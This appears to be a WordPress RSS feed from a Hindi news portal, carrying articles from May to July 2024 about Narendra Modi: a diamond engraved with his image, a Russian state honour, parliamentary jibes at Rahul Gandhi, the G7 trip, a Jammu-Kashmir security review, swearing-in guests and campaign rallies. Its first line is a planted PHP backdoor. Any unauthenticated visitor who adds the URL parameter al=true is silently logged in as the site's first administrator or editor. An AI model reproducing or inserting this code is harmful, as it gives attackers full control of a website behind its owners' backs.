// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); प्रधानमंत्री नरेंद्र मोदी – प्रत्युषा आशा की नयी किरण https://pratyushaashakinayikiran.com न्यूज़ पोर्टल Mon, 15 Jul 2024 09:06:00 +0000 en-US hourly 1 https://wordpress.org/?v=7.0 सूरत में हीरा बनाने वाली कंपनी के कारीगरों ने बड़ा कमाल कर दिखाया, 8 कैरेट के चमचमाते हीरे पर मोदी की छवि उकेरी https://pratyushaashakinayikiran.com/?p=51471 Mon, 15 Jul 2024 09:06:00 +0000 https://pratyushaashakinayikiran.com/?p=51471 सूरत
गुजरात के सूरत में हीरा बनाने वाली कंपनी के कारीगरों ने बड़ा कमाल कर दिखाया है। उन्होंने 8 कैरेट के हीरे पर प्रधानमंत्री नरेंद्र मोदी की छवि उकेरी है। यह आभूषण शहर में एक प्रदर्शनी में प्रदर्शित किया गया है।

एसके कंपनी द्धारा तैयार किया गया हीरा
प्रधानमंत्री नरेंद्र मोदी की छवि को हीरा एसके कंपनी द्धारा तैयार किया गया है। कंपनी के प्रबंधक ने बताया कि हीरा प्रारंभ में 40 कैरेट का लेब्रोन हीरा था। हालांकि, इसे आकार देने और पॉलिश करने के बाद इसका आकार 8 कैरेट कर दिया गया।

20 कारीगरों द्वारा तैयार किया गया
जानकारी के अनुसार, पीएम मोदी की छवि वाला हीरा लगभग एक महीने में करीब 20 कारीगरों द्वारा तैयार किया गया। प्रबंधक ने यह भी बताया कि हीरा 'मेक इन इंडिया' के सिद्धांतों के अनुसार तैयार किया गया था और यह पर्यावरण के अनुकूल था। यह आभूषण सूरत की प्रदर्शनी में आकर्षण का केंद्र बन गया, जिसे गुजरात के गृह मंत्री हर्ष संगवी ने भी देखा।

 

]]>
प्रधानमंत्री नरेंद्र मोदी को रूस के सर्वोच्च नागरिक सम्मान ‘ऑर्डर ऑफ सेंट एंड्रयू द एपोस्टल द फर्स्ट-कॉल’ से सम्मानित किया गया https://pratyushaashakinayikiran.com/?p=49760 Tue, 09 Jul 2024 22:20:00 +0000 https://pratyushaashakinayikiran.com/?p=49760 मॉस्को
प्रधानमंत्री नरेंद्र मोदी को मंगलवार को रूस के सर्वोच्च नागरिक सम्मान 'ऑर्डर ऑफ सेंट एंड्रयू द एपोस्टल द फर्स्ट-कॉल' से सम्मानित किया गया। रूसी राष्ट्रपति व्लादिमीर पुतिन ने दोनों नेताओं के बीच द्विपक्षीय वार्ता के बाद ग्रैंड क्रेमलिन पैलेस में आयोजित एक समारोह के दौरान प्रधानमंत्री मोदी को देश का सर्वोच्च राजकीय सम्मान प्रदान किया। उन्होंने कहा कि भारत के प्रधानमंत्री को रूस और भारत के बीच विशेष रणनीतिक साझेदारी के साथ रूसी और भारतीय लोगों के बीच मैत्रीपूर्ण संबंधों को विकसित करने में उत्कृष्ट कार्यों के लिए यह पुरस्कार दिया गया है। समारोह की शुरुआत में पुतिन ने कहा, "प्रिय प्रधानमंत्री जी, प्रिय मित्र, आपको 'ऑर्डर ऑफ सेंट एंड्रयू द फर्स्ट-कॉल' से सम्मानित करना हमारे देश और यहां के लोगों के बीच मित्रता और आपसी समझ को मजबूत करने में आपके महत्वपूर्ण योगदान के लिए आपके प्रति रूस की कृतज्ञता को दर्शाता है। उन्होंने कहा कि आपने हमेशा हमारे देश के साथ संपर्क बढ़ाने की वकालत की है, यहां तक ​​कि जब आप गुजरात के मुख्यमंत्री थे, तब भी आपने रूसी क्षेत्रों, इस मामले में आस्ट्राखान क्षेत्र के साथ सिस्टर-सिटी संबंध स्थापित करने की पहल की थी।

रूसी राष्ट्रपति ने अपने भाषण में उल्लेख किया कि 10 वर्षों तक भारत के प्रधानमंत्री होने के नाते, आपने वास्तव में यह कोशिश की कि रूस-भारत संबंधों विशेषकर रणनीतिक साझेदारी बेहतर हो और आपने इसे हासिल कर लिया है। आपके सहयोग से, व्यापार, आर्थिक और सैन्य-तकनीकी क्षेत्रों, परमाणु और हाइड्रोकार्बन ऊर्जा, उच्च प्रौद्योगिकी और अंतरिक्ष में सबसे बड़ी रूसी-भारतीय परियोजनाएं सफलतापूर्वक सुचारू रूप से चलाई जा रही है। अंतर्राष्ट्रीय क्षेत्र में रूस-भारत सहयोग के लिए एक स्थिर आधार निर्माण करने में आपके योगदान को कम करके आंकना मुश्किल है। बता दें कि इस 'ऑर्डर ऑफ सेंट एंड्रयू द फर्स्ट-कॉल' सम्मान के लिए जो चीजें दी जाती हैं, उसमें एक बैज, एक स्टार, एक ऑर्डर चेन और एक ऑर्डर रिबन होता है। वहीं, युद्ध क्षेत्र में पराक्रम दिखाने वाले को दिए जाने वाले 'ऑर्डर ऑफ सेंट एंड्रयू द फर्स्ट-कॉल' सम्मान के तहत एक बैज और स्टार के साथ तलवारें दी जाती है। प्रधानमंत्री मोदी ने इस सम्मान को ग्रहण करने के बाद कहा, "ऑर्डर ऑफ सेंट एंड्रयू द एपोस्टल प्राप्त करने पर सम्मानित महसूस कर रहा हूं। मैं इसे भारत के लोगों को समर्पित करता हूं।"

इस सम्मान की स्थापना ज़ार पीटर-एक ने 1699 के आसपास की थी और यह रूस के सबसे पुराने पुरस्कारों में से एक है। इसे 1918 में समाप्त कर दिया गया था और 1998 में रूस के राष्ट्रपति के आदेश पर फिर से इसे बहाल किया गया था। 'ऑर्डर ऑफ सेंट एंड्रयू द फर्स्ट-कॉलेड' को प्रमुख सरकारी और सार्वजनिक हस्तियों, सैन्य नेताओं, विज्ञान, संस्कृति, कला और अर्थव्यवस्था के विभिन्न क्षेत्रों के उत्कृष्ट योगदान और उनकी असाधारण सेवाओं के लिए दिया जाता है। जो रूस की समृद्धि, महानता और गौरव में योगदान करते हैं। साथ ही जो देश की राष्ट्रीय सुरक्षा और संप्रभुता को सुनिश्चित करते हैं। यह मॉस्को के साथ संबंधों को विकसित करने में दिए गए उत्कृष्ट योगदान के लिए विदेशी सरकारों के प्रमुखों और नेताओं को भी दिया जाता है।

]]>
मोदी ने लोकसभा में नेता प्रतिपक्ष राहुल गांधी पर इशारों-इशारों में जमकर तंज कसे, बालक बुद्धि सवार होती है तो गले पड़ते हैं https://pratyushaashakinayikiran.com/?p=47459 Tue, 02 Jul 2024 19:17:00 +0000 https://pratyushaashakinayikiran.com/?p=47459 नई दिल्ली
प्रधानमंत्री नरेंद्र मोदी ने लोकसभा में नेता प्रतिपक्ष राहुल गांधी पर मंगलवार को इशारों-इशारों में जमकर तंज कसे। उन्होंने कहा कि बालक बुद्धि में न बोलने का ठिकाना होता है और न ही व्यवहार का कोई ठिकाना होता है। पीएम मोदी ने कहा, 'जब यह बालक बुद्धि पूरी तरह सवार हो जाती है तो सदन में भी किसी के गले पड़ जाते हैं। यह बालक बुद्धि अपनी सीमाएं खो देती है और सदन में बैठकर आंखें मारने लगते हैं।' नेता विपक्ष को लेकर उन्होंने कहा कि इनकी सच्चाई अब पूरा देश समझ गया है। आज देश इनसे कह रहा है कि तुमसे ना हो पाएगा।
 
नरेंद्र मोदी ने कहा कि कांग्रेस के नेताओं की बयानबाजी ने शोले फिल्म को भी पीछे छोड़ दिया है। उन्होंने कहा, 'शोले में एक मौसी जी थीं… तीसरी बार ही तो हारे हैं, पर मौसी मोरल विक्ट्री तो है ना। अरे मौसी 13 राज्यों में 0 सीटें आई हैं, पर हीरो तो है ना। अरे पार्टी की लुटिया तो डुबोई है, पार्टी अभी भी सांसें तो ले रही है।' उन्होंने कहा कि 16 राज्यों में कांग्रेस जहां अकेले लड़ी, वहां उसका वोट शेयर गिर चुका है। गुजरात, छत्तीसगढ़ और मध्य प्रदेश, तीन राज्यों में जहां कांग्रेस अपने दम पर लड़ी और वहां 64 में से सिर्फ 2 सीट जीत पाई है। इसका साफ मतलब है कि इस चुनाव में कांग्रेस पूरी तरह परजीवी बन चुकी और अपने सहयोगी दलों के कंधे पर चढ़कर सीटों का आंकड़ा बढ़ाया है।  
 
'कांग्रेस में छोटे बच्चे का मन बहलाने का चल रहा काम'
पीएम मोदी ने कहा कि कांग्रेस और उसका इकोसिस्टम दिन-रात हिंदुस्तान के नागरिकों के मन में ये प्रस्थापित करने की कोशिश कर रहा है कि उन्होंने हमें हरा दिया है। ऐसा लग रहा है कि आजकल कांग्रेस में छोटे बच्चे का मन बहलाने का काम चल रहा है। उन्होंने कहा, 'मुझे एक किस्सा याद आ रहा है… 99 मार्क्स लेकर एक बालक घमंड में घूम रहा था और सबको दिखाता था कि देखो कितने मार्क्स आए हैं। लोग भी 99 सुनकर उसे शाबाशी देते थे और हौंसला बढ़ाते थे। फिर उनके टीचर ने बताया कि ये 100 में से नहीं 543 में से 99 लाया है। अब उस बालक बुद्धि को कौन समझाए कि तुमने फेल होने का वर्ल्ड रिकॉर्ड बना दिया है।'

 

]]>
प्रधानमंत्री नरेंद्र मोदी जी-7 शिखर सम्मेलन में भाग लेने के लिए इटली की यात्रा पूरी कर भारत वापस आए https://pratyushaashakinayikiran.com/?p=42071 Sun, 16 Jun 2024 14:06:00 +0000 https://pratyushaashakinayikiran.com/?p=42071 रोम
प्रधानमंत्री नरेंद्र मोदी जी-7 शिखर सम्मेलन में भाग लेने के लिए इटली की यात्रा पूरी कर भारत वापस आ चुके हैं। उनकी यह यात्रा कई मायने में खास रही है। इस दौरान उन्होंने जापान के प्रधानमंत्री फुमियो किशिदा के साथ द्विपक्षीय बैठक भी की। उन्होंने जापान को यह भरोसा दिलाया कि अपने तीसरे कार्यकाल में भी वह जापान के साथ संबंधों को प्राथमिकता देते रहेंगे।

केंद्र सरकार ने एक बयान में कहा कि भारत और जापान कई महत्वपूर्ण क्षेत्रों में सहयोग कर रहे हैं, जिसमें ऐतिहासिक मुंबई-अहमदाबाद हाई स्पीड रेल परियोजना भी शामिल है। बुलेट ट्रेन परियोजना में पांच साल की देरी होने की खबर के बीच जापानी अधिकारियों ने इस साल की शुरुआत में कहा था कि सभी खंडों पर काम शुरू हो गया है और वे प्रगति से संतुष्ट हैं।

जापान के अनुसार, परियोजना को लेकर सभी अनिश्चितताएं दूर हो गई हैं। प्रधानमंत्री मोदी और किशिदा ने 2022-2027 के बीच में भारत में 5 ट्रिलियन येन के जापानी निवेश के लक्ष्य को अंजाम तक पहुंचाने की दिशा में बात की। उन्होंने कहा कि भारत-जापान विशेष रणनीतिक और वैश्विक साझेदारी अपने 10वें वर्ष में है और उन्होंवे संबंधों में हुई प्रगति पर संतोष व्यक्त किया।

आपको बता दें कि इटली की प्रधानमंत्री जॉर्जिया मेलोनी ने शनिवार को दक्षिणी इटली के अपुलिया क्षेत्र में जी-7 शिखर सम्मेलन का आधिकारिक रूप से समापन किया। उन्होंने प्रधानमंत्री नरेंद्र मोदी के साथ अपनी वार्ता का जिक्र किया। दोनों नेताओं ने बैठक के दौरान द्विपक्षीय रणनीतिक साझेदारी को मजबूत करने पर चर्चा की। सात औद्योगिक देशों के समूह की अध्यक्षता करने वाले देश के रूप में इटली ने भागीदार देशों अमेरिका, ब्रिटेन, कनाडा, जापान, जर्मनी, फ्रांस और यूरोपीय संघ (ईयू) के नेताओं की मेजबानी की।

 

]]>
मोदी ने जम्मू-कश्मीर में सुरक्षा स्थिति की समीक्षा बैठक की, आतंकी हमलों पर बोले मोदी, कोई कसर न छोड़ें https://pratyushaashakinayikiran.com/?p=40941 Thu, 13 Jun 2024 17:15:00 +0000 https://pratyushaashakinayikiran.com/?p=40941 नई दिल्ली  
प्रधानमंत्री नरेंद्र मोदी ने गुरुवार को जम्मू-कश्मीर में सुरक्षा स्थिति की समीक्षा बैठक की। इस बैठक में राष्ट्रीय सुरक्षा सलाहकार अजीत डोभाल और अन्य अधिकारी भी शामिल रहे। जम्मू-कश्मीर क्षेत्र में पिछले कुछ दिनों में कई आतंकी हमले हुए हैं। आतंकवादियों ने पिछले चार दिनों में रियासी, कठुआ और डोडा जिलों में चार स्थानों पर हमले किए हैं, जिसमें नौ तीर्थयात्रियों की मौत और एक सीआरपीएफ जवान शहीद हो गया। वहीं सात सुरक्षाकर्मी और कई अन्य घायल हो गए। गुरुवार की बैठक के दौरान प्रधानमंत्री को जम्मू-कश्मीर में सुरक्षा संबंधी स्थिति की पूरी जानकारी दी गई। उन्हें आतंकवाद विरोधी प्रयासों से भी अवगत कराया गया।

आतंक के खिलाफ नहीं रहे कोई कसर: पीएम मोदी
बैठक के दौरान, मोदी ने वरिष्ठ अधिकारियों से भारत की आतंकवाद-विरोधी क्षमताओं की पूरी तरह से तैनाती का आग्रह किया। उन्होंने सुरक्षा बलों की तैनाती और आतंकवाद विरोधी अभियानों के बारे में गृह मंत्री अमित शाह से भी बात की। उल्लेखनीय है कि कठुआ में सुरक्षा बलों के साथ मुठभेड़ में दो संदिग्ध पाकिस्तानी आतंकवादी भी मारे गए और उनके पास से बड़ी मात्रा में हथियार और गोला-बारूद बरामद किया गया। अधिकारियों के अनुसार, सेना, पुलिस और अर्धसैनिक बलों ने सुबह डोडा जिले में गंडोह के कोटा टॉप, चट्टागल्ला और आसपास के इलाकों में तलाशी अभियान फिर से शुरू किया, जहां मंगलवार और बुधवार को आतंकवादियों के साथ अलग-अलग मुठभेड़ में दो पुलिसकर्मियों सहित सात सुरक्षाकर्मी घायल हो गए थे।

पुलिस ने जारी किया स्केच
पुलिस ने बुधवार को दो हमलों में शामिल चार आतंकवादियों के स्केच जारी किए थे और उनकी गिरफ्तारी के लिए सूचना देने वाले को 20 लाख रुपये का इनाम देने की घोषणा की थी। इससे पहले पुलिस ने रविवार को रियासी जिले में तीर्थयात्रियों को ले जा रही बस पर हुए हमले में शामिल एक आतंकवादी पर 20 लाख रुपये का नकद इनाम घोषित किया था और उसका स्केच भी जारी किया था। इस हमले में नौ लोग मारे गए थे और 41 घायल हो गए थे। अधिकारियों ने बताया कि रियासी और राजौरी जिले में तलाशी अभियान जारी है। उन्होंने कहा कि आतंकवादी के स्केच से मिलते-जुलते चेहरे वाले एक शख्स को दोपहर में रियासी में एक बस से हिरासत में लिया गया और उसे पूछताछ के लिए ले जाया गया। उन्होंने बताया कि राजौरी के नौशेरा और पास के पुंछ में भी तलाशी अभियान चलाया जा रहा है। आतंकी खतरे के बारे में खुफिया जानकारी मिलने के बाद कठुआ, सांबा और जम्मू जिलों में भी सुरक्षा बलों को अलर्ट पर रखा गया है।

कठुआ में मंगलवार रात से शुरू हुई और 15 घंटे से अधिक समय तक चली भीषण मुठभेड़ में सुरक्षा बलों ने दो आतंकवादियों को मार गिराया था। इस अभियान में सीआरपीएफ के एक जवान की भी मौत हो गई थी, जबकि एक नागरिक घायल हो गया। पुलिस ने बुधवार को एक परामर्श जारी कर जम्मू क्षेत्र के निवासियों से संदिग्ध व्यक्तियों और वस्तुओं की आवाजाही के बारे में सतर्क रहने का आग्रह किया था। राजौरी और जम्मू जिलों के कुछ हिस्सों में आतंकी खतरे की आशंका जताने वाली खुफिया सूचनाओं के बाद यह परामर्श जारी किया गया।

 

]]>
पीएम मोदी तीसरी बार प्रधानमंत्री की शपथ लेने वाले हैं, ऐश्वर्या एस मेनन लेंगी PM के शपथ समारोह में हिस्सा https://pratyushaashakinayikiran.com/?p=39255 Sat, 08 Jun 2024 19:45:00 +0000 https://pratyushaashakinayikiran.com/?p=39255 नई दिल्ली
प्रधानमंत्री नरेंद्र मोदी तीसरी बार प्रधानमंत्री की शपथ लेने वाले हैं। उनके शपथ ग्रहण कार्यक्रम में देश-विदेश के मेहमान शिरकत करने वाले हैं। ऐसा बताया जा रहा है कि कुल 8 हजार खास मेहमानों को पीएम मोदी के शपथ ग्रहण समारोह में हिस्सा लेने के लिए निमंत्रण भेजा गया है। इन मेहमानों में दक्षिणी रेलवे के चेन्नई डिवीजन की वरिष्ठ सहायक लोको पायलट ऐश्वर्या एस मेनन नरेंद्र मोदी और नई सरकार के शपथ ग्रहण समारोह में भाग लेने वाले विशेष मेहमानों में शामिल हैं।

बता दें ऐश्वर्या एस मेनन ने वंदे भारत ट्रेनों के साथ-साथ जनशताब्दी जैसी विभिन्न ट्रेनों में लोको पायलट के रूप में काम किया है। ऐश्वर्या ने चेन्नई-विजयवाड़ा और चेन्नई-कोयंबटूर वंदे भारत एक्सप्रेस सेवाओं की शुरुआत से लोको पायलट के रूप में काम किया है। ऐश्वर्या एक शानदार लोको पायलट हैं, जिन्होंने अपनी चुस्त सटीकता, सतर्कता और रेलवे सिग्नलिंग के गहन ज्ञान के लिए वरिष्ठ अधिकारियों से प्रशंसा प्राप्त की है।

प्रधानमंत्री नरेंद्र मोदी के शपथ ग्रहण समारोह में एशिया की पहली महिला लोको पायलट सुरेखा यादव भी शामिल होंगी। वे छत्रपति शिवाजी महाराज टर्मिनस-सोलापुर से वंदे भारत ट्रेल को संचालित करती हैं। पीएम मोदी के शपथ ग्रहण समारोह में कुल 10 लोको पायलट भाग ले रहे हैं। सुरेखा यादव 1988 में भारत की पहली महिला ट्रेन ड्राइवर बनीं और सेमी-हाई स्पीड वंदे भारत एक्सप्रेस की पहली महिला लोको पायलट भी थीं। नई सरकार के शपथ ग्रहण समारोह में सेंट्रल विस्टा प्रोजेक्ट पर काम करने वाले सफाई कर्मचारी, ट्रांसजेंडर और मजदूर भी विशेष अतिथियों में शामिल होंगे।

]]>
प्रधानमंत्री नरेंद्र मोदी लोकसभा चुनाव के परिणाम आने के बाद बीजेपी मुख्यालय पहुंचे, कहा- नॉर्थ ईस्ट में कांग्रेस का सूपड़ा साफ https://pratyushaashakinayikiran.com/?p=37903 Tue, 04 Jun 2024 22:15:00 +0000 https://pratyushaashakinayikiran.com/?p=37903 नई दिल्ली
प्रधानमंत्री नरेंद्र मोदी लोकसभा चुनाव के परिणाम आने के बाद बीजेपी मुख्यालय पहुंचे। पीएम मोदी ने देश को संबोधित करते हुए कहा कि 1962 के बाद तीसरी बार लगातार किसी गठबंधन की सरकार बन रही है। पीएम मोदी ने कांग्रेस पर हमला करते हुए कहा कि उनका नॉर्थ ईस्ट सूपड़ा साफ हो गया है। प्रधानमंत्री नरेंद्र मोदी ने कहा कि भाजपा ने हिमाचल प्रदेश, उत्तराखंड, छत्तीसगढ़, मध्यप्रदेश, गुजरात और कई राज्यों में भाजपा ने क्लीन स्वीप किया है। हमारी तेलंगाना में सीटें दोगुनी हो गई है। बिहार में हमने नीतीश कुमार के नेतृत्व में शानदार प्रदर्शन किया है। आंध्र प्रदेश में चंद्रबाबू नायडू के नेतृत्व में एनडीए का प्रदर्शन लाजवाब रहा।

प्रधानमंत्री नरेंद्र मोदी ने कहा कि मेरी मां के जाने के बाद यह मेरा पहला चुनाव था। मैं बहुत भावुक था, लेकिन मेरे देश की माताओं, बहनों और बेटियों ने उनकी कभी कमी महसूस नहीं होने दी। उनका यह प्यार व आशीर्वाद किसी आंकड़ों में प्रदर्शित नहीं हो सकता है। प्रधानमंत्री नरेंद्र मोदी ने कहा कि एनडीए की इस सरकार में कई राष्ट्रीय हित के कार्य हुए। गरीबों के लिए करोड़ों घर बने, गरीबों को गैस के सिलेंडर दिए, गरीबों को 5 लाख का स्वास्थ्य कवर दिया। कश्मीर से 370 हटाने का काम किया। देश में आईटी रिफॉर्म हुए, जिस कारण भारत तेजी से विकसित होती अर्थव्यवस्था है। भारत इस कार्यकाल में विश्व की तीसरी अर्थव्यवस्था बनेगा।

जेपी नड्डा ने पीएम मोदी का किया स्वागत
भाजपा के राष्ट्रीय अध्यक्ष जे.पी. नड्डा ने कहा कि आज बहुत ही खुशी का विषय है कि आज पीएम मोदी को धन्यवाद देने के लिए और विजय उत्सव मनाने के लिए इतनी बड़ी संख्या में लोग पहुंचे हैं। प्रधानमंत्री मोदी ने हमेशा देश को, पार्टी को, देश की जनता का फ्रंट से नेतृत्व किया है। मैं उनका अभिनंदन करता हूं।

पीएम मोदी के साथ खड़ा है पूरा देश
भाजपा के राष्ट्रीय अध्यक्ष जे.पी. नड्डा ने कहा कि कोई भी गठबंधन भारत के इतिहास में पहली बार लगातार तीसरी बार मोदी जी के नेतृत्व में सरकार बनाने जा रहा है। आज ओडिशा में पहली बार मोदी जी के नेतृत्व में पहली बार भाजपा की सरकार बन रही है, लेकिन कुछ लोग 30-40 सीटें जीत लें तो धूम मचाने लग जाते हैं। वे भूल जाते हैं कि देश किस तरह मोदी जी के साथ खड़ा है।

]]>
मोदी ने गुरदासपुर में कहा- INDI गठबंधन कह रहे हैं कि पाकिस्तान से बचकर रहना होगा लेकिन ये नया भारत है https://pratyushaashakinayikiran.com/?p=33882 Fri, 24 May 2024 20:06:00 +0000 https://pratyushaashakinayikiran.com/?p=33882 पंजाब
प्रधानमंत्री नरेंद्र मोदी ने शुक्रवार को पंजाब के गुरदासपुर में एक जनसभा को संबोधित किया। यहां उन्होंने विपक्षी गठबंधन पर निशाना साधते हुए कहा कि पंजाब में विपक्षी गठबंधन ‘इंडिया' के सहयोगी एक-दूसरे को गाली देते हैं। पंजाब में कांग्रेस ने अलगाववाद को हवा दी। दिल्ली में सिखों का नरसंहार कराया। कांग्रेस जब तक केंद्र सरकार में रही। दंगाईयों को बचाती रही। उन्होंने कहा कि हमने सिख दंगों की फाइलें खुलवाईं। आरोपियों को सजा दिलवाई। आज भी कांग्रेस और आम आदमी पार्टी को इस बात की तकलीफ है। इसलिए ये लोग मुझे दिन रात गालियां देते हैं। जब देशहित की बात आती है तो कांग्रेस सबसे पीछे खड़ी नजर आएगी। कांग्रेस की पंजाब में जब सरकार थी। तब ऑर्डर दिल्ली से आते थे। कैप्टन अमरिंदर सिंह ने दिल्ली के शहजादे के ऑर्डर मानने से कर दिया। कैप्टन अमरिंदर को मुख्यमंत्री पद से हटा दिया गया।
 
मोदी ने सीएम भगवंत मान पर तंज कसते हुए कहा कि पंजाब को आज भी दरबारी चला रहे हैं। इनके मालिक जेल गए तो पंजाब की सरकार ठप पड़ने लगी। यहां के मुख्यमंत्री को नए ऑर्डर लेने के लिए तिहाड़ जेल जाना पड़ा। उन्होंने कहा कि 1 जून के बाद कट्टर भ्रष्टाचारी (अरविंद केजरीवाल) फिर जेल जाएंगे। पंजाब की सरकार फिर जेल से चलेगी क्या?, उन्होंने कहा कि ये पंजाब के भविष्य को दांव पर लगा रहे हैं। आज पंजाब जिस स्थिति में है। उससे बाहर निकालने के लिए मैं पंजाब से प्रार्थना करने आया हूं। पंजाब के उज्जवल भविष्य के लिए इस बार पंजाब ज्यादा से ज्यादा बीजेपी के सांसद चुनकर के भेजे।

इससे पहले मोदी ने दिवंगत सांसद और बॉलीवुड अभिनेता विनोद खन्ना को याद करते हुए कहा कि मैंने उनके साथ काम किया है। उन्होंने गुरदासपुर के विकास के लिए कई काम किए। उन्होंने कई पुल बनवाए। विनोद खन्ना जमीन से जुड़े नेता थे। मोदी ने आगे कहा कि इंडी गठबंधन वाले कह रहे हैं कि पाकिस्तान के पास परमाणु हथियार हैं। पाकिस्तान से बचकर रहना चाहिए। लेकिन ये नया भारत है घर में घुसकर मारता है। उन्होंने राहुल गांधी पर तंज कसते हुए कहा कि शहजादे विदेश में जाकर देश का नाम बदनाम करते हैं।

 

]]>